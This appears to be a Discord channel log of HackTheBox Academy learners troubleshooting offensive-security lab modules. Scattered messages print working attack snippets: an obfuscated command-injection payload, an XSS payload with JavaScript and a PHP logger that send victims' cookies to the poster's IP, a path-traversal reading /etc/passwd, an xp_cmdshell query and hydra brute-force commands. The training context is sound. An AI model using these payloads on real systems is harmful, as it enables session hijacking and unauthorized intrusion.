#modules
1 messages · Page 44 of 1
Hello to everyone who has done the Skills Assessment - File Upload Attacks ,
?
I got the source code for upload.php but I don't understand how, lol. I would appreciate it if someone could explain; I'm stuck.
I'm trying with impacket mssqlclient.py again: ModuleNotFoundError: No module named 'impacket.examples.utils'. Can someone tell me what to do?
jsnice down for anyone else? any1 know an alternative
Maybe update impacket?
i got the newest v1.0 i guess
that is most definitely not the latest version
one scenario would be if this was an oddity in having domain admins be local admin on the box that could suggest they actually log into it from time to time. So if you leverage system or admin from some other means, you have a chance at dumping domain admin creds from the box.
yea, that was mentioned
but thats not inherent to them being local admins, just a red flag
exactly
Project's main page at https://www.secureauth.com/labs/open-source-tools/impacket/
ChangeLog for 0.10.0:
Library improvements
Dropped support for Python 2.7.
Refactored the testing infrastru...
Who do I talk to regarding someone trying to get me to help them with the CPTS exam?
maybe a serious rule break role or dm a staff?
Yea. prolly dming staff is best right?
ye
thats the one i used to update
Yo, I'm in the web attacks module at Error-based XXE.
Exploit works for the files in the question. However, other interesting files like the /etc/passwd only return 'entity reference loop'..
First off, this comes from php (loadXML), not the web server?
Also, I'm not sure what is the cause of the error. I was thinking maybe encoding or any special XML characters in the file, but I'm not sure which ones that would be for /etc/passwd. Also other source code files (index.php) return it
'entity reference loop'
are you doing direct output or OOB?
direct out. It's part of the error message which returns the file content for 'valid' files
well sounds like there's a reference loop: entity1 => entity2 => entity1.
Yea, sure. I just don't get how this is coming. I tried super random names, and I don't see how /etc/passwd would reference any other entity
what exact payload are you using?
Is it okay to DM to avoid spoiling anything for others?
i guess so
I really love the 90K wordlist for a SMB attack and then finding out after 2 hours I should have reversed the order
Damn that sucks
tac
hey @high sentinel you mind helping me understand something if you know... because I'm just not sure how this works in terms of vHosts and IPs regarding adding them to my /etc/hosts or am i putting them in the wrong place - currently doing Info Gathering - Web Edition; Active Infra ID - and I got the answer - but I had to use the cheat sheet bc nowhere in the documentation up to that point talks about using vHosts (there is a virtual hosts section, but after)
yeah, sure
Are you asking how vhosts work?
basically? because in that section it says "these are the vhosts you'll need"
but nowhere previously did it talk about using vHosts
So when you type in url into a search bar there is a process called Dns that maps the url to an ip
stealing my "work"
i just want to know what makes the curl command that gets me the answer different from the other tools
np, i was joking
what command did you use?
The computer checks your host file first, then the dns cache, then it will go thru the dns process. The /etc/hosts file is just a way to resolve a name to an ip
curl -s and -H syntax that was in the cheat sheet
ok so i just forgot to add the IP to the vhosts in /etc/hosts
then?
well, the priorities of local/remote host resolution actually depend on the config. It's usually like that but you can set it up how you want to
add -v and try without the -H and with it. Compare both outputs of the requests going to the server
That should give you the idea of how that works
ok I figured it out
I just didn't add the IP to the vhost
added it; refreshed the webpage
:D
i'm just the big dumb
nice, but you may want to try other ways as well
You may not have the option to edit hosts file in some cases (like pivoting through non-rooted compromised host)
/etc/nsswitch.conf is the file where priorities are configured
We all make stupid mistakes haha. Part of learning : D
The other day I was stuck on a stupid question because i forgot how to rdp
Do you guys hack servers for me?
no
This group fund for python questions?
this is for academy. There is a #programming channel.
does anybody have a good course for machine learning?
thanks
i realized why i was getting the result weird... I was curling the wrong http page :^)
thanks
you will need to verify your hackthebox account in #bot-commands to see it
i forgot to actually put the vHost URL and was trying to use the actual IP :^)
Learn python first if you don't know how to program. Maybe take some stats classes.
My cousin does Ml as a job
when I tell you I died on the inside when i made the dots connect
but I didn't want to move on to the next thing without knowing what the difference was
the difference was
As i've said:
nice, but you may want to try other ways as well
You may not have the option to edit hosts file in some cases (like pivoting through non-rooted compromised host)
well yes that's why I said; I understood how the -s and -H worked
it logically made sense how they worked in my brain
-s is source and -H host
wut? isn't -s for silent?
there's also another option for stuff like burp, you might want to check that as well
i use python for programming math equations and i know how to use it to solve PDE or FEM and now i want to learn machine learning
i'm trying to stick with the tools provided so far :D but if burp comes up i won't hesitate lol
hey everyone, noob here. I'm trying the redeemer challenge, but when I try connecting to redis: redis-cli -h IPaddress. Nothing happens. it just hangs there. Any advice?
if you're further interested in that, it becomes even more interesting with HTTPS and stuff like SNI. Domain fronting is an interesting related topic
Is this part of hackthebox academy?
This is mostly focused on modules so we might not be of good help
add debug/verbose flags? check traffic? ping the box?
There is a #challenges channel but i think you need to verify
Thanks, will add verbose to see whats happening. I can ping it and the connection is happening to certain extent, but just hangs
i can type stuff in it, but nothing happens..
I have to type ctrl + c to exit it
nc -nvz -w 5 ip:port?
Whats nvc ?
typo
Can't parse x.x.x.x:6379 as an IP address
lol
ahh i see
(UNKNOWN) []x.x.x.x 6379 (redis) open
but then , using redis-cli, it just hangs there.. not sure whats happening. I tried restarting the server couple of times already
what if you just connect using nc and type help or keys?
i've told you what to try. Not sure what's happening in there, possible different port/host, can't tell
But using nc is not working either, as above.
I've seen some people demoing it and they go straight to IPADDRESS:port> prompt
not working? how come?
(UNKNOWN) []x.x.x.x 6379 (redis) open
sounds good to me
but where is the redis-cli prompt?
that's not my point. If you're having further trouble you need to go deeper
how?
already told you - check the traffic
let me take a pcap and check
i'd say it would be easier to just do tcpdump -i any -vvv tcp port 6379 in one window and use the nc in a second. Typing anything should show you data going both ways
Thanks, will dig and see what I can find.. at the moment, I can't even see any traffic on the tcpdump
as soon as I come off the VPN, boom all the traffic starts flowing through tcpdump
sounds like a vpn issue
Need a sanity check for the Skills Assessment for Using Web Proxies, in particular the first question, getting a flag from lucky.php.
Can't tell if it's bugged or if I'm doing it wrong.
Can I dm you about the zap scanner module? im almost 100% sure i have the flag but its telling me its not correct nvm im very very dumb
Can someone help me with the Burp Intruder module, specifically: Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag
I don't understand how to do it
feel free to dm me
Thanks, sent you a message.
how do i copy and paste from host to pwnbox
ctrl+c > ctrl+v (if pasting to the terminal, ctrl+shift+v)
doesn't work tried it
first time that pwnbox is run it asks if you want to share clipboard
hmm never got asked that any time i've run it
lol nope
i have vnc config window that says kclipboard but its just a window no oik button or nothing
¯\_(ツ)_/¯
pwnbox is hot garbage i'd rather put my &&&& in a beehive than use it
Simple solution, dont use it
lovely sentiment but some of the tools they want you to use don't work on newest version of kali
and then i spend hours trying to debug which is bullshit
I havent had a single issue at all. The only time ive had to use pwnbox was for some web related things where scans wouldnt run properly on my kali machine
all tools so far have been perfectly fine
Which tool are you having an issue with?
that's ok it was a joke don't get all butthurt
Based
Web Pwnbox is kinda bad
I have issues with full screening it
lol. Im spending my time trying to help you. Heres a valuable lesson, you are not entitled to help from anyone. If someone is going out of their way to try to help you, its generally a good idea to try to be nice to them. Now, best of luck. I hope you get your tool working
I just dont use it if i can avoid it
Using a VM with vpn is just easier
agreed. Altho I do have to get used to using an in browser machine. RTO is only doable using the provided in browser machine. Thats how you get to use cobalt strike
But i think ill keep avoiding pwnbox for the time being
I can't wait to do RTO
Yea. Im super excited for it
Thats the only thing pushing me through the more boring parts of CPTS lmao
Hey @graceful rampart can you sanity check sth for me, info gathering web says to use a "numbers.txt" file for the wordlist in active subdomain enumeration in the example but I don't see anything? lol am I just... silly?
I was not doing good notes on the exercises back then 😬
oof
ik the pattern file is one we create there but like it's asking for a wordlist I just don't see
I have great notes on those sections, but none of it really gave me any issues and none of it was really new to me so i didnt bother taking notes on the exercises
sure its not a resource?
hmm
i checked pwnbox as well
im looking at the module, i dont see it mention a numbers.txt wordlist anywhere
in the example
I know but it's nice to follow along :^)
i was just gonna give up and start answering questions anyway
lol
fair. It appears to just be a placeholder for whatever wordlist you want to use
yeah
ugh
stuck at that how many zones... i must not be able to count right or something LOL
I think you might be looking for this #modules message
Right lol
If you're in the 20s or higher, you're WAY off
Took me a while to finish that question
I STG
I must have had a space when I put that in
because I put in the answer way earlier
and it was incorrect
but no apparently it was exactly correct
brb malding
It's not the amount you would expect
oh no; I had the answer
i definitely had the answer
I just had a space in my answer the first time

I did that earlier. And then as soon as I went to message someone I realized I had a space that wasn't supposed to be there
also while statements are based at basic automation without looking for a specific tool that does it better
cat x| while read var; do task var other args; done
Hey all, I'm struggling on Shells and Payloads for host 1 ||where i know the attack vector but for some reason metasploit is erroring out. When i manually navigate to the loaded exploit i get a 500 error. Is there something wrong with how i'm setting the options?||
||The first time i try to navigate to it manually it gives a 404, when i reload it gives 500, which i guess makes sense considering it's supposed to create a metainterpreter or whatever its called||
Your lhost doesn't look correct
its the jumpbox
ahh, maybe that first one?
word, thanks
Np
You could always just generate a payload with msfvenom
Upload it and then trigger it manually
Or try not using a meterpreter payload
||yeah thats a thought, but need to be converted into a .war file||
You can generate a war file is msfvenom
hm.. kk
With*
thanks
Np
Np
Hi
Hi, can someone help me please? I'm stuck in Module "Introduction to Bash Scripting"
y so serial
What?
funny name for a git repository
?
nvm
what's the issue?
ysoserial.net
Oh ok, sorry I didnt know
huh?
Nah, thats not really helping me, but thanks. My code seems to be fine and only has very few lines, but the result wont be accepted
I even tried it with my local VM and countless other ways - same result, but wont be accepted
i'm not getting what the issue is. You didn't post anything specific
ysoserial is not related to bash at all, it's related to java deserialization attacks
One second
Anyone else having vpn issues where the host address isn't resolved and openvpn loops?
no, post a specific issue that you're having if you're expecting help
var="9M"; salt=""; for i in {0..27}; do; var=$(echo $var | base64); done; salt=${#var}; echo $salt;
The code is supposed to encode $var 28 times and then get the number of characters of the hash
Sadly I dont understand my error
and the error is?
Simply that HTB Academy claims my answer as wrong
yeah i get that, i mean you're not getting any error when running the code, right?
what does it output?
34070
When I use salt=$(echo -n $var | wc -m) it simply returns 34071, but this is still wrong
And with that few lines of script code I'm sure the error is somewhere else
do; var is not the correct syntax by the way
yes, I didnt use ";" actually, I just wrote it in separate lines
and i think the issue is also using base64 instead of base64 -w0
then just debug it - check the actual output, lower the number of iterations etc
I already did this
I also tried with 27 and 29 iterations instead of 28
And various code variations
you're not getting the point
try 8 iterations and debug the output you're getting
then if it's correct, just increase/decrease gradually until you find you what the issue is
The output is already correct
I even tried copying the output to a file and counting the characters from there
How do I know if the output is correct at 8 iterations?
In command injection module "Bypassing Other Blacklisted Characters"
I'm having trouble understanding why my payloads not working
||ip=127.0.0.1${LS_COLORS:10:1}cd%09${PATH:0:1}home${LS_COLORS:10:1}{ls,-la}||
I'm attempting to access /home but I must not be understanding something quite right.
In my mind this payload should do....
127.0.0.1;cd /home;ls -la
Which should execute but I'm just not understanding something
My bad understanding is that each section is executed so 127.0.0.1; Then moves to /home and then executes ls -la?
or is my understanding wrong on that @sly tapir
Ill give it a go and see what happens I feel like I cant be too far off just been struggling for a minute
it works on the terminal that way...your not wrong... just tried it ; learn something new everyday
i always just do ls -al /directory/
now that I think about it
thats probably better from what I'm trying to do lol
Grr okay have to be messing up something else let me read back through everything again
maybe {LS_COLORS} is different on target? Looks like right idea, just try to do it different
So I am working on the PtT Windows Module of Password Attacks. The first task tells me to RDP to the machine using the provided credentials and find out how many tickets there are. When I try to RDP in, though, it keeps giving me a logon failure. I am 100% certain I am using the displayed credentials and it is driving me insane.
I'll look at env variables again I didnt quite think of that
I just assumed what was there facepalm.jpg
tfw i wonder why the ffuf request in the info gathering web is taking forever... Turns out; i needed to reset the target; idk if this is one of the targets that has a dedicated IP or not when you reset but I got the same IP :D
Did this one recently, DM for more hints
DM me.
ok so ffuf is a neat tool :D
For the Firewall and IDS/IPS Evasion - Hard Lab, im so stuck on this one any help please
scan for all ports
okay ill try that i keep coming up with only 2 thanks
also you'll need to use a specific type of scan talked about in the module
no super fancy tricks to at least identify it
no question...just venting. The RDP session for the final assessment in the Shells and Payloads module is ridiculously slow. Took me 10% of the allocated time to just login to apache on the first host 😫
yes; now take what you learned from the IDS/IPS section and see what you might be able to do
i was missing a freaking 0..........thank you so much again
mood
dude I was so mad earlier; my answer had a space in it so it didn't accept xD
OMG yes!!! thats the bs ive had too haha
Im a firm believer that the pivoting module should come before that one
@graceful rampart just finished the info gathering one WOO
Nice. I just finished the ffuf module
yeah, i was thinking i should just use chisel or something... it will take me all day to complete the assessment at this rate
Yea. I used sshuttle to pivot via the attack machine
Need help with Hard Skills Assessment - Password Attacks, I made it quite a ways, I know im on the right track, problem is there must be something wrong with the wordlist selected because im trying to crack a password and its taking forever.
dm me what youre trying to crack and what wordlist youre using
Okay thanks MPT
Need check for the Skills Assessment for Using Web Proxies
Can't tell if it's bugged or if I'm doing it wrong.
What issue are you having?
I couldn't find the flag for the first question.
If you're still having issues shoot me a dm. I'm not at my pc right now but I did that module earlier today so you should be able to jog my memory
ok ok I'll write to you, thanks
somebody save me?
:)
from the nothing you've become?
I registered on the site, ok! But when I try to connect to HTB academy it says that my email has not been registered.
some bug on the page is happening
Can anyone help with the Footprinting Lab - Easy? I'm not sure if my question would end up being a spoiler, so anyone around for a DM would be helpful. Thanks.
You can DM me if you need
Academy and standard site are separate
I can't use the same email?
You need to create an account on academy you can use the same email
He didn't let me use the same email, says the email exists in the database
Are you trying to sign in, or create
Because there shouldn't be an issue with creating an account
Usually if an email doesn't exist in the login database means creating an account should be ok
If it exists, are you sure you don't already have an account?
Have you asked it to send you a password reset?
Easy solutions here
I managed to do but only with another email. Same email doesn't work
no
@fathom pendant why don't you hang around in the vc sometime? you seem to be pretty active
I don't like talking to people. I do it as a job and that's enough already
I did it! Thank you
Anyway straying off topic in this chat
#1024429874246590575 for general help, this channel is for questions regarding the modules in the academy site
~~I'm having trouble with the lab "Attacking Common Services - Hard". I've gained a basic foothold for the user ||fiona|| and can connect via ||RDP|| and ||MSSQL|| - and can impersonate the user ||john|| - however, cannot seem to get ||sysadmin||.
Has anyone finished this lab that could help out / DM?~~
Scratch that; I had a sudden realisation and solved it.
TL;DR What is the best way to get a reverse shell through proxy?
I just finished the Shells and Payloads module and in the assessment I used chisel to pivot through the host.
When using the psexec metasploit module, I had to use a bind_tcp payload, as I couldn't figure out how to catch the reverse shell. I also couldn't drop into an actual shell from the meterpreter prompt and just had to use its built in cd,cat etc. to get the flag.
What is the best way to pivot metasploit exploits and catch the rev shells?
In the file inclusion section question #2 is stumping me and I'm not understanding why. Submit contents of flag.txt and we know the file path. I'm not understanding why I cannot pull the contents from this. I can read etc/password with X=||../../../../etc/passwd|| but cannot get access to the flag.txt file even though I know the direct path I should be able to just do X=../(DIRECTPATH) should I not?
should just be something like ||X=../../../../usr/share/flags/flag.txt|| should it not?
Apparently I'm dumb and somehow didnt do this correct first time ><
Read the rules bud. This isn't the server, nor the channel for this anyway.
Did you figure it out?
No
Did end up figuring it out thanks.
Getting stumped on basic bypass but working through reading through everything again
Yep no worries. Just a tip for asking a module related question, post the exact exercise (e.g. if it's the Skills Assessment, or one of the module exercises) so the person can go and look it up on their notes or look at the question themselves
Yeah in most cases the answer is just right there hahah
It always is even if im banging my head for hours
Makes me cry sometimes :p
The problem I seem to have is logically walking through. Like for example here I see that it allows ".." and encodes the "/" I dont quite understand the next test I should make for taking my next small step
Hmm well, there isn't really a "logical" next step that you're supposed to test. You try whatever you think might work.. and if you do this enough times, you just tend towards a framework you can use when you encounter a specific class of vulnerability
So ended up getting it but I dont understand how I would get there other than knowing its something I should try
Just trying to make sure I have notes as a sort of smal mental checklists when going through more web apps.
hey guys can somebody help me out with the Skills Assessment - File Upload Attacks, so far i got the upload.php source code, I understood the logic and bypassed all the filters, i did get a couple of success however my uploaded files do not accept php commands
got it
yes please
Hello folks! In the module RDP and SOCKS Tunneling with SocksOverRDP, anyone faced the following issue when loading SocksOverRDP-Plugin.dll?
Never mind, worked after bypassing Windows Defender.
If you're using Metasploit your best bet is using autoroute. I personally just don't like meterpreter. If I'm pivoting through a Linux host I'll use socat to set up a reverse port forward. On a windows host you can use netsh to do it
Can anyone please give me a hint in the Documentation & Reporting Practice Lab on how to get Domain Admin? Seems kind of hard for a first question so i feel like I'm missing something
Maybe today any help for this problem?! 🤯
Can anyone pls hack an instagram account for me pls. I would very much appreciate it. Dm me for infos.
@vale salmon Can I DM you regarding this please?
Sure
no read the rules
Im sorry i didnt realize
also for future reference, asking on discord, which is corporate owned and susceptible and agreeable to even low level subpoena, for a stranger, that could be an undercover cop for all you know, to commit a crime on your behalf is incredibly, monumentally, stupid.
What academy modules are recommended to read for OSCP preparation?
hello, I have a question regarding the skill assessment of windows command line, the 3rd question ask me to enumerate the system information to get the host name and I will find the flag for the next question, I manage to answered the question but never saw a flag, I try to use the answer as the password for the uses3 user but it looks the password is wrong can someone give me some insight or I am missing something?
the whole CPTS path really
id exclude the AD module
Youll end up confusing yourself on OSCP if you learn that much AD
ok never mind this is very misleading XD correction user3

post that in #858470491676737536 looks like a typo
oki
I think it's more impressive if no one has brought it up until now
lmao

I have to recursively scan the paths to find the flag. I use this command `ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v`
make sure you have the correct IP and port
dm me the exact command you used
i don't even think I can expose anything here you go: ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://165.227.231.233:31349/FUZZ -recursion -recursion-depth 1 -e .php -v
Make sure you got the IP and port correct. I know, you already checked but i said the same thing during that module several times and i had the wrong ip and port in my commands
hmm its correct. should i open up a chat with support?
🤷
ill open one up
usually its a couple things, the ip/port because you tabbed a previous call, the list directory is wrong, or the list doesnt have what you need
poggers
Server rule number 5: Unless otherwise dictated by the channel, please keep all communication in English.
OKAY SORRY
Hey guys I can't find prolabs channel here
At the very bottom i.e, #prolabs-dante
Hey all! I'm stuck at the XSS Session Hijacking part. I've tried to search on Discord but couldn't find an answer so I'd appreciate some help. Put some spoiler tags.
||This is what I've done so far:
- Made an index.php using the code provided:
<?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>
-I use this payload in the Profile Picture URL:
"><script src=http://10.10.15.200:80/script.js></script>
- I put this in my script.js to grab the cookies:
new Image().src="http:/10.10.15.200:80/index.php?c="+document.cookie;
I've also tried:
document.location='http://10.10.15.200/index.php?c='+document.cookie;
I use this to start my php server:
sudo php -S 0.0.0.0:80
All I get on my server is:
accepted
200 GET /script.js
closed||
Thanks for helping ❤️
Did you read the script and fill out the "remote addr"
I still can't see it
Plz help
yes! i am using this index.php:
||
<?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "Victim IP: {$_SERVER['10.129.52.35']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>||
I'm still getting the same output in my terminal though
go to #welcome. You need to verify your account
Got it thank you
Can anyone please give me a hint in the Documentation & Reporting Practice Lab on how to get Domain Admin? The admin hash doesn't get me anywhere. Seems kind of hard for a first question of a medium lab so i feel like I'm missing something
have you done the rest of the CPTS course yet? or did ya skip to this one?
if youre trying to use spoiler tags you do it like this: || message here ||
thanks for || help || It's ||work||
I could use a nudge on Footprinting, Medium Lab. I have been unable to find the user login or sa credentials. I found a mounted drive, but when I tried to mount it to my machine, I cannot access the results. I have tried various enumeration techniques for SMB and RCP, but I always get turned away because I don't have credentials. Unable to login via RDP. Any tips would be appreciated.
Yes i did
TBH, any of them. Use Academy to smooth out your weak areas.
Then I dont have much advice other than reviewing your AD notes
it should be fairly easy then
the final two modules are meant to be culminations of everything youve learned
Im having problems connecting via RDP in Kerberos - Windows, AD module. Wrong credentials :S
Yup, it worked
. Thanks! By the way do you know what's the difference between inserting domain in the name and leaving it out? Since in the module says to add @domain when using kinit.
Not sure. I dont use kinit much. Usually just set the KRB5CCNAME variable manually
But i believe its cuz kinit only expects the username because it can pull the domain from the ticket
For the 'documentation and reporting' module, they start us out with "write hat" as a reporting tool, but this might very well be one of the worst pieces of software I've ever used. What are the better options?
the recommended way to learn is to do some HTB Academy modules, then attempt to do 2 of the recommended htb machines (with a writeup if needed) and then attempt a 3rd recommended machine on your own
Hello, how can i compile the Inveigh Github Repo to inveigh.exe?
What error are you receiving
Module: Local File Inclusion
Section: PHP Wrappers
Issue: Used the data wrapper technique and can view 320___.txt file but can't read the flag any help is appreciated
Lesson learned brute forcing winrm goes faster then rdp. Wish i found out when i started 2 data ago. 🫣
No worries !! Solved
data ? or days
Days.
Hi, I am beating my head against a wall in Password attack - credential hunting in Linux. I used the hint of user and known PW and created mutated list of passwords and tried with hydra and cme but found nothing. Found the expected pw in a forum post from a year ago but that also didnt work. Can somebody dm me the kira pw? Waiting 1h in front of a screen is not really rewarding
Ok thanks, I'll have to look up how to do that with socat. My pivoting skills are limited to a chisel walkthrough at the moment
Isn't oscp final exam like 3 machines 
3 ad machines and iirc 4 other boxes
You'll learn in the pivoting module
Yea. 3 AD machines 4 others. I can't say a lot about it but the AD is mind numbingly easy
That's what I've heard haha
Ive been hearing people get tripped up on the oscp ad section cause they overthink it
and then when they stop its seriously done in like 30 mins to an hour
Nvm. Maybe as a hint, username is case sensitive and the case in the hint is not correct.
folks at OFFSEC going through this chat
Oh i didnt pass the exam lol. I just did the AD bit in 45 minutes
Theres very very little actual AD exploitation
Do you know what your pain point was? or just a mystery Fail letter?
Yea, i was most definitely not ready for OSCP when i took it lol
so blitzed the AD and bombed the individual boxes? lol
anyways, in other news: The dreaded day has arrived. My kali VM finally pooped the bed
pretty much. My time studying for OSCP was weird cuz its when I discovered AD for the first time and fell in love. I spent a vast majority of my time just learning about AD
Rip
Does anyone know whats the command for retrieving the content of a imap message?
Have tried fetch command, but haven't gotten results back
mutt -f imap://server
if you meant that you actually wanted to connect to the server and read the mailbox
otherwise you can locally do mail
or even read a .eml or so .. not totally clear what you meant there
no clue what you mean by that
right, okey
try checking other mailboxes. Inbox isnt the only one people exclusively use.
Hey team, Im stuck for days on the Password Attacks Lab -HARD Initial access as I need to reset the Target all the time... Can somebody help me on that please?
what part are you stuck on
I'm currently at Footprinting;Imap section
I have found an inbox with a message, but i have trouble displaying the content
have selected it with LIST command
and select
what other email service is there besides imap?
theres both pop3 and imaps
dming you
Is your message for me or are you asking to somebody else
you, what part of the lab are you stuck on. I have some loose notes on it.
Initial access, I tried ||Bruteforce the smb, Bruteforce the rdp, both with johanna user only and also with user list|| but nothing
and i have really good notes on it
which wordlist did you use
the one given in the Resources and the mutated one created with this list and the rules given
Shoulda found it then if your bruteforce commands were correct
Its one that triggers so fast I thought it was a false positive at first
I mean it's my second day of bruteforce attempts hahahha
yeah so probably less of using the wrong list or wrong service and more likely your command arguments are wrong.
can I DM you??
at the airport and sounds like Man in the Purple Tux might have better notes than me. I don't have the command structure I used listed.
just that very much if you have it correct, youll find it in seconds. If its taking a minute or longer, somethings wrong.
Dm me what command your using
no worries, got it!
Hello can someone pls help me
i got hacked and i am trying to hack my account back
for google
or i wanna do something back to the person that hacked my account
how do i get their Ip address
so i can turn off their wifi
darn it then what do you do here
its for industry professionals to discuss and learn.
darn i was hoping to just get their Ip
no. read the rules
Well i will figure it out
second time that not taking the time to fully read the section sends me down a rabbit hole....
I need help with the Hard Skills Assessment on the Password Attacks module.
I have come a long way made it far, just unsure how to do a specific step to get to the next stage.
I cracked a .vhd file, just unsure how to mount it on the windows machine, i have tried transferring it and accessing it through rdp and its asking for admin privileges. Unsure what to do here, the section gives very little detail on mounting a hard drive.
has anybody had issues using wireshark within the attack box given to you in active directory enumeration and attack module... not your attack box from htb but the one you have to rdp into in order to enumerate the internal network
what specific issue are you having?
when I try to start wireshark from applications>pentesting>sniffing spoofing>wireshark as htb-student it does not open after putting in password, if I try from command line as htb-student I get zero traffic on any interface probably because not root, when I log in as root wireshark will not open at all through command line
I can share screen in academy voice chat and demo exactly the problem
you can use this to mount it in linux #modules message
but for windows if you can't double click to mount it i think you should be able to in disk manager (i'm not sure about windows home)
Hello, i'm in Password Attacks > Credential Hunting in Linux
I tried creating a custom.rule to include LoveYou1 in it, but I couldn't find kira's password. Can anyone help?
i realized a lot of people are having an issue cuz you need admin perms to mount a vhd and a lot of people are just trying to mount it on the windows machine is the lab
If you want to mount it on windows youll need your own windows vm to do so on
use the custom rule that is provided
i think the mindset of this section is if you have to download the .vhd file on to your machine to extract the hash anyway, so you can just find a way to mount it on your machine, that's why they don't let you mount it on the target machine and i think this caught a lot of people off guard
agreed
but the module only shows you how to extract and crack the hash not mounted on linux (only on windows which is double click 🤣 )
I just happen to use a windows VM for attacking a good bit of the time so i just had to boot it up and connect to smb
yea
sleight oversight
i think i did the same thing the first time i did this module and the command that i was sharing is i think from someone that helped me on this module
oh yeah the first time i did this the hash was corrupted 🤣
lmao
i use the custom rule that is provided. but can't find password.
||hydra -l kira -P ./loveyou_passwd.txt ftp://10.129.70.146 -t 32||
is it correct?
its not in the list to begin with
you have to add LoveYou1 to password.list before mutating it
(if you want the bruteforce to go quick just create a file with only that 1 password and then mutate that)
Hi guys! Having some trouble on Attacking En
After obtaining Domain Admin rights, authenticate to the domain controller and submit the contents of the flag.txt file on the Administrator Desktop.
Already have the creds and added the user to the Domain Admins yet i can't RDP to the DC.
Edit: I'm just dumb, PTH is a your friend.
Hi im doing the intro to windows command line module and i been stuck in this question for hours, what should i do?
which section are you on?
oh i already solved it thank you, i was at the wrong machine it seems that you have to ssh to 172.16.5.155
oh yeah i last question of the skill assessment
they should have noted somewhere you need to do it on the DC
Filter by 4625 events
Get-WinEvent -FilterHashTable @{LogName='Security';ID=4625}
it is confusing cause they dont say that
Thank you
Hey folks, I have a question about the Meterpreter Tunneling & Port Forwarding section in the Pivoting, Tunneling, and Port Forwarding module.
||In the example where they describe setting up autoroute, they use the subnet "172.16.5.0/23" - but the IP address you see on the interface is 172.16.5.129 with a subnet mask of 255.255.254.0. Technically, wouldn't that make the subnet 172.16.4.0/23 as the usable IP range is 172.16.4.1 - 172.16.5.254?
If so, the answer expected for the second question is wrong, as far as I can tell (and I'll post this in #858470491676737536) - but if it's not wrong, I have no idea why you would supply 172.16.5.0/23... any ideas?||
for AD skills assessment 2... I am stumped. I have user B*** and the db creds I can use for a system shell... but I am not sure where to go from here
Hey, anyone available for some help with the pivoting module? Specifically the reverse port forward section? My ssh -R command isn't working for me
i skipped the pivot module and went straight to AD... dont recommend lol
ouch. Yea, not recommended
I'm the opposite, I skipped a few modules to go to pivot
good call
Dm me the command youre using
DM me
"You have just completed the Active Directory Enumeration & Attacks module! "
sweet jesus dont skip the other modules lol
hey @rich vale have you done the redeemer machine
@sterile thistle nope, really just went straight in for the AD module
do you know much about redis servers?
sorry nope, dont know anything about them
ok thank you
careful with spoilers
Hi there
I am a newbie in the information security field. I want to become an expert. Would you guys please help me to fulfill my desire.
Please suggest where to start from bug bounty or just do ctf.
Are you from Ukraine?)
english only
Any hints for Password Attacks module for section Password Attacks Lab - Easy where the question is Examine the first target and submit the root password as the answer. ? Tried hydra and ncrack with username root and passwords list provided by HTB and mutated password list sorted and stripped from duplicates, created from custom rule resources using the passwords from resources as well. Thinking of using rockyou but seems too much for this lab and will take too much time even with highest threads possible.
Are you only trying to brute-force the root user?
Perhaps you need to find your way in with another user first and work up to root once you've gained a foothold. Which is the case for almost all labs/boxes on HTB. You will seldom ever brute-force root from the outset.
For ssh yes, for ftp i'm currently trying full username-password combo
but doing it with ncrack for ftp since hydra has been screwing me around, hope ncrack will work
oh
found creds for ftp !
Excellent, now keep pulling at the thread until the whole sweater unravels.
aaaand owned
. Thanks for the hints 
How to start pen testing for adroid in kali linux?
C or rust for getting into hacking ?
Whichever you like more lol. But programming is very different than hacking
Hi I'm doing The Live Engagement of shells and payloads and am struggling with the first host.
I have found where I think I should upload the .war payload and successfully uploaded it, but when I navigate to that page I get a 404 error.
I also tried msfconsole tomcat_mgr_upload script but after uploading the script get "exploit aborted due to failure failed to execute the payload"
Thank you
is there any benefit of using medusa over hydra? One of the challenges call for it but the performance seems to be extremely slow compared to hydra.
I hate medusa
Good evening. I need help on the Attacking Common Services - Hard module. I figured out the linked server but I'm stuck at the commands and I receive syntax errors when I try to execute them
Anyone here completed the 'live engagement shells & payloads'?
I am also struggling with exploiting the first and second targets....
I got those without any uploads or shells... very bad labs
There is nothing wrong with that lab lol
Both of you can DM me. The more info you give me the faster ill reply
well I wanted to practice uploads, and got answer from a nmap scan... thats not practice! lol
@graceful rampart Sent you a PM
can someone help me with te beginner module ?
How about you ask an actual question and if someone can answer it they will
EXECUTE('xp_cmdshell 'whoami'(''sysadmin'')') AT [LOCAL.TEST.LINKED.SRV] can somebody help me fixing this? I got a syntax error and if I'm not mistaken the corresponding module won't tell me how to fix it
mixing quotes is usually bad and I have no idea where youre getting whoami("sysadmin") from as a cmdline utility
cause right now execute is basically reading it as `'xp_cmdshell ', whoami, '("sysadmin")'`
thanks. I fixed it by asking ChatGPT
I need to learn coding x_X
I got it from the "Attacking common services" module
MSSQL
Lol asking chatgpt
Skills Assessment - Web Fuzzing - 2nd question- I've found 5 extensions but can't figure out in what order I need to put them. Do I need to add dots or commas between them?
This is the worst assessment
I think it's respectively and with commas
I didn't have to put commas in between
Hi, is there any modules, paths, etc. that deals with the burpsuite tool?
"Using Web Proxies" module should get you started with the basics of using burp and zap
okey ty my friend
For anyone struggling with cme failing in "USING CRACKMAPEXEC" - "Password Spraying" - MSSQL enumeration: apply this patch: https://github.com/fortra/impacket/issues/856
I have this issue, termx:~$ mssqlclient.py sql_svc@10.10.10.27 -windows-auth Impacket v0.9.22.dev1+20200513.101403.9a4b3f52 - Copyright 2020 SecureAuth Corporation Password: [*] Encryption required...
Hi, anyone can help me with this? STACK-BASED BUFFER OVERFLOWS ON LINUX X86 > Determine the Length for Shellcode
Hey guys i started coding like 3 months ago and i think maybe someone can send me a script or code of some program so i can start coding and de-coding with that script thanks
no.
this channel is for discussing academy modules
